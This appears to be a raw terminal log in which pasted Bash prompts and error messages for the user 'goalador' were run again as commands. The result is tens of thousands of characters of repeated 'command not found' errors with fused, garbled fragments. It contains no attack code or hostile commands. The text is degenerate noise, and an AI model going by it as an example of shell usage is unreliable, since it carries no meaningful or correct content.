hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +neuauf.de]$ bash: [goalador@gatabash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goaladorgoalador@gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goaladorgoalador@gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ not found +bash: not: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goaladorgoalador@gatanda:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: hhneuauf.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: f.de]$: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash:bash: [goalador@gatandabash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash:bash: [goalador@gatanda: command not found +bash: bash:bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +obash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +]$ [goalador@gatanda hbash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +neuauf.de]$ bash: [goalador@gatabash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: comhhneuauf.de]$goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goaladorgoalador@gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goaladorgoalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goaladorgoalador@gatanda:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: hhneuauf.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ f.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: f.de]$: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatandabash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ not found +bash: not: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: 